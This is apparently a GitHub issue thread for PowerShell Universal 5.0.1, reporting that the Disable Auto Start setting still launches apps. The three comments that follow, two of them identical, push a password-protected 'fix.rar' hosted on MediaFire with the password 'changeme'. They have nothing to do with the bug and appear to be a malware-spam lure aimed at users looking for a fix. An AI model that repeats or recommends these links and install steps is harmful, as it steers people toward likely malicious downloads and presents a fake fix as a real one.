### ISSUE TITLE
Disable Auto Start is not working

### ISSUE THREAD

**Issue by adamdriscoll** [ironmansoftware/powershell-universal#3658]
### Version

5.0.1

### Severity

Low

### Environment

msi

### Steps to Reproduce

https://forums.ironmansoftware.com/t/v-5-after-upgrade-apps-appear-to-not-honor-the-disable-auto-start-setting/11144

### Expected behavior

```console
Should not start apps with this switch.
```

### Actual behavior

```console
Starts apps.
```

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
